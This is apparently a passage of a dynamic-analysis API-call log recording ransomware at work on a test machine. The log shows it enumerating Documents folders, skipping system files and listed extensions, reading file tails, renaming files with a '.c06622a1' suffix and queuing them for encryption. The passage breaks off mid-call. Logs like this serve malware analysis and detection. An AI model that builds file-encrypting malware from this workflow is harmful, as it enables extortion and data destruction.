lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a43320, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd7a43320, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7a43320, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0149.419] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0149.419] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa64287c0, ftCreationTime.dwHighDateTime=0x1d5dee6, ftLastAccessTime.dwLowDateTime=0xef03a180, ftLastAccessTime.dwHighDateTime=0x1d5da02, ftLastWriteTime.dwLowDateTime=0xef03a180, ftLastWriteTime.dwHighDateTime=0x1d5da02, nFileSizeHigh=0x0, nFileSizeLow=0x79b3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Xgz9J67R.ots", cAlternateFileName="")) returned 1 [0149.419] _wcsicmp (_Str1="Xgz9J67R.ots", _Str2="README.c06622a1.TXT") returned 6 [0149.419] wcsstr (_Str="Xgz9J67R.ots", _SubStr="README") returned 0x0 [0149.419] _wcsicmp (_Str1="autorun.inf", _Str2="Xgz9J67R.ots") returned -23 [0149.419] wcslen (_String="autorun.inf") returned 0xb [0149.419] _wcsicmp (_Str1="boot.ini", _Str2="Xgz9J67R.ots") returned -22 [0149.419] wcslen (_String="boot.ini") returned 0x8 [0149.419] _wcsicmp (_Str1="bootfont.bin", _Str2="Xgz9J67R.ots") returned -22 [0149.419] wcslen (_String="bootfont.bin") returned 0xc [0149.419] _wcsicmp (_Str1="bootsect.bak", _Str2="Xgz9J67R.ots") returned -22 [0149.419] wcslen (_String="bootsect.bak") returned 0xc [0149.419] _wcsicmp (_Str1="desktop.ini", _Str2="Xgz9J67R.ots") returned -20 [0149.419] wcslen (_String="desktop.ini") returned 0xb [0149.419] _wcsicmp (_Str1="iconcache.db", _Str2="Xgz9J67R.ots") returned -15 [0149.419] wcslen (_String="iconcache.db") returned 0xc [0149.419] _wcsicmp (_Str1="ntldr", _Str2="Xgz9J67R.ots") returned -10 [0149.419] wcslen (_String="ntldr") returned 0x5 [0149.419] _wcsicmp (_Str1="ntuser.dat", _Str2="Xgz9J67R.ots") returned -10 [0149.419] wcslen (_String="ntuser.dat") returned 0xa [0149.420] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Xgz9J67R.ots") returned -10 [0149.420] wcslen (_String="ntuser.dat.log") returned 0xe [0149.420] _wcsicmp (_Str1="ntuser.ini", _Str2="Xgz9J67R.ots") returned -10 [0149.420] wcslen (_String="ntuser.ini") returned 0xa [0149.420] _wcsicmp (_Str1="thumbs.db", _Str2="Xgz9J67R.ots") returned -4 [0149.420] wcslen (_String="thumbs.db") returned 0x9 [0149.420] _wcsicmp (_Str1="386", _Str2="ots") returned -60 [0149.420] wcslen (_String="386") returned 0x3 [0149.420] _wcsicmp (_Str1="adv", _Str2="ots") returned -14 [0149.420] wcslen (_String="adv") returned 0x3 [0149.420] _wcsicmp (_Str1="ani", _Str2="ots") returned -14 [0149.420] wcslen (_String="ani") returned 0x3 [0149.420] _wcsicmp (_Str1="bat", _Str2="ots") returned -13 [0149.420] wcslen (_String="bat") returned 0x3 [0149.420] _wcsicmp (_Str1="bin", _Str2="ots") returned -13 [0149.420] wcslen (_String="bin") returned 0x3 [0149.420] _wcsicmp (_Str1="cab", _Str2="ots") returned -12 [0149.420] wcslen (_String="cab") returned 0x3 [0149.420] _wcsicmp (_Str1="cmd", _Str2="ots") returned -12 [0149.420] wcslen (_String="cmd") returned 0x3 [0149.420] _wcsicmp (_Str1="com", _Str2="ots") returned -12 [0149.420] wcslen (_String="com") returned 0x3 [0149.420] _wcsicmp (_Str1="cpl", _Str2="ots") returned -12 [0149.420] wcslen (_String="cpl") returned 0x3 [0149.420] _wcsicmp (_Str1="cur", _Str2="ots") returned -12 [0149.420] wcslen (_String="cur") returned 0x3 [0149.420] _wcsicmp (_Str1="deskthemepack", _Str2="ots") returned -11 [0149.420] wcslen (_String="deskthemepack") returned 0xd [0149.420] _wcsicmp (_Str1="diagcab", _Str2="ots") returned -11 [0149.420] wcslen (_String="diagcab") returned 0x7 [0149.421] _wcsicmp (_Str1="diagcfg", _Str2="ots") returned -11 [0149.421] wcslen (_String="diagcfg") returned 0x7 [0149.421] _wcsicmp (_Str1="diagpkg", _Str2="ots") returned -11 [0149.421] wcslen (_String="diagpkg") returned 0x7 [0149.421] _wcsicmp (_Str1="dll", _Str2="ots") returned -11 [0149.421] wcslen (_String="dll") returned 0x3 [0149.421] _wcsicmp (_Str1="drv", _Str2="ots") returned -11 [0149.421] wcslen (_String="drv") returned 0x3 [0149.421] _wcsicmp (_Str1="exe", _Str2="ots") returned -10 [0149.421] wcslen (_String="exe") returned 0x3 [0149.421] _wcsicmp (_Str1="hlp", _Str2="ots") returned -7 [0149.421] wcslen (_String="hlp") returned 0x3 [0149.421] _wcsicmp (_Str1="icl", _Str2="ots") returned -6 [0149.421] wcslen (_String="icl") returned 0x3 [0149.421] _wcsicmp (_Str1="icns", _Str2="ots") returned -6 [0149.421] wcslen (_String="icns") returned 0x4 [0149.421] _wcsicmp (_Str1="ico", _Str2="ots") returned -6 [0149.421] wcslen (_String="ico") returned 0x3 [0149.421] _wcsicmp (_Str1="ics", _Str2="ots") returned -6 [0149.421] wcslen (_String="ics") returned 0x3 [0149.421] _wcsicmp (_Str1="idx", _Str2="ots") returned -6 [0149.421] wcslen (_String="idx") returned 0x3 [0149.421] _wcsicmp (_Str1="ldf", _Str2="ots") returned -3 [0149.421] wcslen (_String="ldf") returned 0x3 [0149.421] _wcsicmp (_Str1="lnk", _Str2="ots") returned -3 [0149.421] wcslen (_String="lnk") returned 0x3 [0149.421] _wcsicmp (_Str1="mod", _Str2="ots") returned -2 [0149.421] wcslen (_String="mod") returned 0x3 [0149.421] _wcsicmp (_Str1="mpa", _Str2="ots") returned -2 [0149.421] wcslen (_String="mpa") returned 0x3 [0149.421] _wcsicmp (_Str1="msc", _Str2="ots") returned -2 [0149.422] wcslen (_String="msc") returned 0x3 [0149.422] _wcsicmp (_Str1="msp", _Str2="ots") returned -2 [0149.422] wcslen (_String="msp") returned 0x3 [0149.422] _wcsicmp (_Str1="msstyles", _Str2="ots") returned -2 [0149.422] wcslen (_String="msstyles") returned 0x8 [0149.422] _wcsicmp (_Str1="msu", _Str2="ots") returned -2 [0149.422] wcslen (_String="msu") returned 0x3 [0149.422] _wcsicmp (_Str1="nls", _Str2="ots") returned -1 [0149.422] wcslen (_String="nls") returned 0x3 [0149.422] _wcsicmp (_Str1="nomedia", _Str2="ots") returned -1 [0149.422] wcslen (_String="nomedia") returned 0x7 [0149.422] _wcsicmp (_Str1="ocx", _Str2="ots") returned -17 [0149.422] wcslen (_String="ocx") returned 0x3 [0149.422] _wcsicmp (_Str1="prf", _Str2="ots") returned 1 [0149.422] wcslen (_String="prf") returned 0x3 [0149.422] _wcsicmp (_Str1="ps1", _Str2="ots") returned 1 [0149.422] wcslen (_String="ps1") returned 0x3 [0149.422] _wcsicmp (_Str1="rom", _Str2="ots") returned 3 [0149.422] wcslen (_String="rom") returned 0x3 [0149.422] _wcsicmp (_Str1="rtp", _Str2="ots") returned 3 [0149.422] wcslen (_String="rtp") returned 0x3 [0149.422] _wcsicmp (_Str1="scr", _Str2="ots") returned 4 [0149.422] wcslen (_String="scr") returned 0x3 [0149.422] _wcsicmp (_Str1="shs", _Str2="ots") returned 4 [0149.422] wcslen (_String="shs") returned 0x3 [0149.422] _wcsicmp (_Str1="spl", _Str2="ots") returned 4 [0149.422] wcslen (_String="spl") returned 0x3 [0149.422] _wcsicmp (_Str1="sys", _Str2="ots") returned 4 [0149.422] wcslen (_String="sys") returned 0x3 [0149.422] _wcsicmp (_Str1="theme", _Str2="ots") returned 5 [0149.422] wcslen (_String="theme") returned 0x5 [0149.422] _wcsicmp (_Str1="themepack", _Str2="ots") returned 5 [0149.423] wcslen (_String="themepack") returned 0x9 [0149.423] _wcsicmp (_Str1="wpx", _Str2="ots") returned 8 [0149.423] wcslen (_String="wpx") returned 0x3 [0149.423] _wcsicmp (_Str1="lock", _Str2="ots") returned -3 [0149.423] wcslen (_String="lock") returned 0x4 [0149.423] _wcsicmp (_Str1="key", _Str2="ots") returned -4 [0149.423] wcslen (_String="key") returned 0x3 [0149.423] _wcsicmp (_Str1="hta", _Str2="ots") returned -7 [0149.423] wcslen (_String="hta") returned 0x3 [0149.423] _wcsicmp (_Str1="msi", _Str2="ots") returned -2 [0149.423] wcslen (_String="msi") returned 0x3 [0149.423] _wcsicmp (_Str1="pdb", _Str2="ots") returned 1 [0149.423] wcslen (_String="pdb") returned 0x3 [0149.423] _wcsicmp (_Str1="sql", _Str2="ots") returned 4 [0149.423] wcslen (_String="sql") returned 0x3 [0149.423] _wcsicmp (_Str1="sqlite", _Str2="ots") returned 4 [0149.423] wcslen (_String="sqlite") returned 0x6 [0149.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1")) returned 0x10 [0149.423] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.423] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" [0149.423] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1") returned 0x44 [0149.423] wcscpy (in: _Dest=0x4530132, _Source="Xgz9J67R.ots" | out: _Dest="Xgz9J67R.ots") returned="Xgz9J67R.ots" [0149.423] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Xgz9J67R.ots", dwFileAttributes=0x80) returned 1 [0149.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Xgz9J67R.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\xgz9j67r.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0149.424] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.424] ReadFile (in: hFile=0x138, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.425] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x7bc9c8ed [0149.425] RtlComputeCrc32 (PartialCrc=0xc8ed, Buffer=0x3fe674, Length=0x80) returned 0x7c9e51d3 [0149.425] RtlComputeCrc32 (PartialCrc=0x51d3, Buffer=0x3fe674, Length=0x80) returned 0xb55ec75c [0149.425] RtlComputeCrc32 (PartialCrc=0xc75c, Buffer=0x3fe674, Length=0x80) returned 0x89d33bb7 [0149.425] RtlComputeCrc32 (PartialCrc=0x3bb7, Buffer=0x3fe674, Length=0x80) returned 0x1b45ce3 [0149.425] CloseHandle (hObject=0x138) returned 1 [0149.425] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.425] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Xgz9J67R.ots" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Xgz9J67R.ots") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Xgz9J67R.ots" [0149.425] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Xgz9J67R.ots") returned 0x51 [0149.425] wcscpy (in: _Dest=0x4540152, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.425] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Xgz9J67R.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\xgz9j67r.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Xgz9J67R.ots.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\xgz9j67r.ots.c06622a1"), dwFlags=0x8) returned 1 [0149.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Xgz9J67R.ots.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\xgz9j67r.ots.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x138 [0149.427] CreateIoCompletionPort (FileHandle=0x138, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.427] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4d30020 [0149.434] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3743b8f7 [0149.434] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5d09f081 [0149.434] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x338dc59 [0149.434] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7340f779 [0149.434] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x13f6e4a8 [0149.434] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3b384c9a [0149.434] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5cd66db [0149.434] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2411be83 [0149.437] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4d30094, Length=0x80) returned 0x6e947870 [0149.437] RtlComputeCrc32 (PartialCrc=0x7870, Buffer=0x4d30094, Length=0x80) returned 0x6dd0be06 [0149.437] RtlComputeCrc32 (PartialCrc=0xbe06, Buffer=0x4d30094, Length=0x80) returned 0x7236df15 [0149.437] RtlComputeCrc32 (PartialCrc=0xdf15, Buffer=0x4d30094, Length=0x80) returned 0xf6cae25d [0149.437] RtlComputeCrc32 (PartialCrc=0xe25d, Buffer=0x4d30094, Length=0x80) returned 0x47d172f4 [0149.437] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4d30020) returned 1 [0149.437] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.438] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.438] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75123460, ftCreationTime.dwHighDateTime=0x1d5dc1c, ftLastAccessTime.dwLowDateTime=0x109964d0, ftLastAccessTime.dwHighDateTime=0x1d5dae2, ftLastWriteTime.dwLowDateTime=0x109964d0, ftLastWriteTime.dwHighDateTime=0x1d5dae2, nFileSizeHigh=0x0, nFileSizeLow=0x2cf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y1QH4rGO.ods", cAlternateFileName="")) returned 1 [0149.438] _wcsicmp (_Str1="Y1QH4rGO.ods", _Str2="README.c06622a1.TXT") returned 7 [0149.438] wcsstr (_Str="Y1QH4rGO.ods", _SubStr="README") returned 0x0 [0149.438] _wcsicmp (_Str1="autorun.inf", _Str2="Y1QH4rGO.ods") returned -24 [0149.438] wcslen (_String="autorun.inf") returned 0xb [0149.438] _wcsicmp (_Str1="boot.ini", _Str2="Y1QH4rGO.ods") returned -23 [0149.438] wcslen (_String="boot.ini") returned 0x8 [0149.438] _wcsicmp (_Str1="bootfont.bin", _Str2="Y1QH4rGO.ods") returned -23 [0149.438] wcslen (_String="bootfont.bin") returned 0xc [0149.438] _wcsicmp (_Str1="bootsect.bak", _Str2="Y1QH4rGO.ods") returned -23 [0149.438] wcslen (_String="bootsect.bak") returned 0xc [0149.438] _wcsicmp (_Str1="desktop.ini", _Str2="Y1QH4rGO.ods") returned -21 [0149.438] wcslen (_String="desktop.ini") returned 0xb [0149.438] _wcsicmp (_Str1="iconcache.db", _Str2="Y1QH4rGO.ods") returned -16 [0149.438] wcslen (_String="iconcache.db") returned 0xc [0149.438] _wcsicmp (_Str1="ntldr", _Str2="Y1QH4rGO.ods") returned -11 [0149.438] wcslen (_String="ntldr") returned 0x5 [0149.438] _wcsicmp (_Str1="ntuser.dat", _Str2="Y1QH4rGO.ods") returned -11 [0149.438] wcslen (_String="ntuser.dat") returned 0xa [0149.438] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Y1QH4rGO.ods") returned -11 [0149.438] wcslen (_String="ntuser.dat.log") returned 0xe [0149.438] _wcsicmp (_Str1="ntuser.ini", _Str2="Y1QH4rGO.ods") returned -11 [0149.438] wcslen (_String="ntuser.ini") returned 0xa [0149.438] _wcsicmp (_Str1="thumbs.db", _Str2="Y1QH4rGO.ods") returned -5 [0149.438] wcslen (_String="thumbs.db") returned 0x9 [0149.438] _wcsicmp (_Str1="386", _Str2="ods") returned -60 [0149.439] wcslen (_String="386") returned 0x3 [0149.439] _wcsicmp (_Str1="adv", _Str2="ods") returned -14 [0149.439] wcslen (_String="adv") returned 0x3 [0149.439] _wcsicmp (_Str1="ani", _Str2="ods") returned -14 [0149.439] wcslen (_String="ani") returned 0x3 [0149.439] _wcsicmp (_Str1="bat", _Str2="ods") returned -13 [0149.439] wcslen (_String="bat") returned 0x3 [0149.439] _wcsicmp (_Str1="bin", _Str2="ods") returned -13 [0149.439] wcslen (_String="bin") returned 0x3 [0149.439] _wcsicmp (_Str1="cab", _Str2="ods") returned -12 [0149.439] wcslen (_String="cab") returned 0x3 [0149.439] _wcsicmp (_Str1="cmd", _Str2="ods") returned -12 [0149.439] wcslen (_String="cmd") returned 0x3 [0149.439] _wcsicmp (_Str1="com", _Str2="ods") returned -12 [0149.439] wcslen (_String="com") returned 0x3 [0149.439] _wcsicmp (_Str1="cpl", _Str2="ods") returned -12 [0149.439] wcslen (_String="cpl") returned 0x3 [0149.439] _wcsicmp (_Str1="cur", _Str2="ods") returned -12 [0149.439] wcslen (_String="cur") returned 0x3 [0149.439] _wcsicmp (_Str1="deskthemepack", _Str2="ods") returned -11 [0149.439] wcslen (_String="deskthemepack") returned 0xd [0149.439] _wcsicmp (_Str1="diagcab", _Str2="ods") returned -11 [0149.439] wcslen (_String="diagcab") returned 0x7 [0149.439] _wcsicmp (_Str1="diagcfg", _Str2="ods") returned -11 [0149.439] wcslen (_String="diagcfg") returned 0x7 [0149.439] _wcsicmp (_Str1="diagpkg", _Str2="ods") returned -11 [0149.439] wcslen (_String="diagpkg") returned 0x7 [0149.439] _wcsicmp (_Str1="dll", _Str2="ods") returned -11 [0149.439] wcslen (_String="dll") returned 0x3 [0149.440] _wcsicmp (_Str1="drv", _Str2="ods") returned -11 [0149.440] wcslen (_String="drv") returned 0x3 [0149.440] _wcsicmp (_Str1="exe", _Str2="ods") returned -10 [0149.440] wcslen (_String="exe") returned 0x3 [0149.440] _wcsicmp (_Str1="hlp", _Str2="ods") returned -7 [0149.440] wcslen (_String="hlp") returned 0x3 [0149.440] _wcsicmp (_Str1="icl", _Str2="ods") returned -6 [0149.440] wcslen (_String="icl") returned 0x3 [0149.440] _wcsicmp (_Str1="icns", _Str2="ods") returned -6 [0149.440] wcslen (_String="icns") returned 0x4 [0149.440] _wcsicmp (_Str1="ico", _Str2="ods") returned -6 [0149.440] wcslen (_String="ico") returned 0x3 [0149.440] _wcsicmp (_Str1="ics", _Str2="ods") returned -6 [0149.440] wcslen (_String="ics") returned 0x3 [0149.440] _wcsicmp (_Str1="idx", _Str2="ods") returned -6 [0149.440] wcslen (_String="idx") returned 0x3 [0149.440] _wcsicmp (_Str1="ldf", _Str2="ods") returned -3 [0149.440] wcslen (_String="ldf") returned 0x3 [0149.440] _wcsicmp (_Str1="lnk", _Str2="ods") returned -3 [0149.440] wcslen (_String="lnk") returned 0x3 [0149.440] _wcsicmp (_Str1="mod", _Str2="ods") returned -2 [0149.440] wcslen (_String="mod") returned 0x3 [0149.440] _wcsicmp (_Str1="mpa", _Str2="ods") returned -2 [0149.440] wcslen (_String="mpa") returned 0x3 [0149.440] _wcsicmp (_Str1="msc", _Str2="ods") returned -2 [0149.440] wcslen (_String="msc") returned 0x3 [0149.440] _wcsicmp (_Str1="msp", _Str2="ods") returned -2 [0149.440] wcslen (_String="msp") returned 0x3 [0149.440] _wcsicmp (_Str1="msstyles", _Str2="ods") returned -2 [0149.441] wcslen (_String="msstyles") returned 0x8 [0149.441] _wcsicmp (_Str1="msu", _Str2="ods") returned -2 [0149.441] wcslen (_String="msu") returned 0x3 [0149.441] _wcsicmp (_Str1="nls", _Str2="ods") returned -1 [0149.441] wcslen (_String="nls") returned 0x3 [0149.441] _wcsicmp (_Str1="nomedia", _Str2="ods") returned -1 [0149.441] wcslen (_String="nomedia") returned 0x7 [0149.441] _wcsicmp (_Str1="ocx", _Str2="ods") returned -1 [0149.441] wcslen (_String="ocx") returned 0x3 [0149.441] _wcsicmp (_Str1="prf", _Str2="ods") returned 1 [0149.441] wcslen (_String="prf") returned 0x3 [0149.441] _wcsicmp (_Str1="ps1", _Str2="ods") returned 1 [0149.441] wcslen (_String="ps1") returned 0x3 [0149.441] _wcsicmp (_Str1="rom", _Str2="ods") returned 3 [0149.441] wcslen (_String="rom") returned 0x3 [0149.441] _wcsicmp (_Str1="rtp", _Str2="ods") returned 3 [0149.441] wcslen (_String="rtp") returned 0x3 [0149.441] _wcsicmp (_Str1="scr", _Str2="ods") returned 4 [0149.441] wcslen (_String="scr") returned 0x3 [0149.441] _wcsicmp (_Str1="shs", _Str2="ods") returned 4 [0149.441] wcslen (_String="shs") returned 0x3 [0149.441] _wcsicmp (_Str1="spl", _Str2="ods") returned 4 [0149.441] wcslen (_String="spl") returned 0x3 [0149.441] _wcsicmp (_Str1="sys", _Str2="ods") returned 4 [0149.441] wcslen (_String="sys") returned 0x3 [0149.441] _wcsicmp (_Str1="theme", _Str2="ods") returned 5 [0149.441] wcslen (_String="theme") returned 0x5 [0149.441] _wcsicmp (_Str1="themepack", _Str2="ods") returned 5 [0149.441] wcslen (_String="themepack") returned 0x9 [0149.442] _wcsicmp (_Str1="wpx", _Str2="ods") returned 8 [0149.442] wcslen (_String="wpx") returned 0x3 [0149.442] _wcsicmp (_Str1="lock", _Str2="ods") returned -3 [0149.442] wcslen (_String="lock") returned 0x4 [0149.442] _wcsicmp (_Str1="key", _Str2="ods") returned -4 [0149.442] wcslen (_String="key") returned 0x3 [0149.442] _wcsicmp (_Str1="hta", _Str2="ods") returned -7 [0149.442] wcslen (_String="hta") returned 0x3 [0149.442] _wcsicmp (_Str1="msi", _Str2="ods") returned -2 [0149.442] wcslen (_String="msi") returned 0x3 [0149.442] _wcsicmp (_Str1="pdb", _Str2="ods") returned 1 [0149.442] wcslen (_String="pdb") returned 0x3 [0149.442] _wcsicmp (_Str1="sql", _Str2="ods") returned 4 [0149.442] wcslen (_String="sql") returned 0x3 [0149.442] _wcsicmp (_Str1="sqlite", _Str2="ods") returned 4 [0149.442] wcslen (_String="sqlite") returned 0x6 [0149.442] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1")) returned 0x10 [0149.442] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.442] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" [0149.442] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1") returned 0x44 [0149.442] wcscpy (in: _Dest=0x4530132, _Source="Y1QH4rGO.ods" | out: _Dest="Y1QH4rGO.ods") returned="Y1QH4rGO.ods" [0149.442] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Y1QH4rGO.ods", dwFileAttributes=0x80) returned 1 [0149.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Y1QH4rGO.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\y1qh4rgo.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x658 [0149.443] SetFilePointerEx (in: hFile=0x658, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.443] ReadFile (in: hFile=0x658, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.444] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x3216dfbe [0149.444] RtlComputeCrc32 (PartialCrc=0xdfbe, Buffer=0x3fe674, Length=0x80) returned 0xa0f057f7 [0149.444] RtlComputeCrc32 (PartialCrc=0x57f7, Buffer=0x3fe674, Length=0x80) returned 0x5d801bf2 [0149.444] RtlComputeCrc32 (PartialCrc=0x1bf2, Buffer=0x3fe674, Length=0x80) returned 0xb7032074 [0149.444] RtlComputeCrc32 (PartialCrc=0x2074, Buffer=0x3fe674, Length=0x80) returned 0x6b747425 [0149.444] CloseHandle (hObject=0x658) returned 1 [0149.444] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.444] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Y1QH4rGO.ods" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Y1QH4rGO.ods") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Y1QH4rGO.ods" [0149.444] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Y1QH4rGO.ods") returned 0x51 [0149.444] wcscpy (in: _Dest=0x4540152, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.444] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 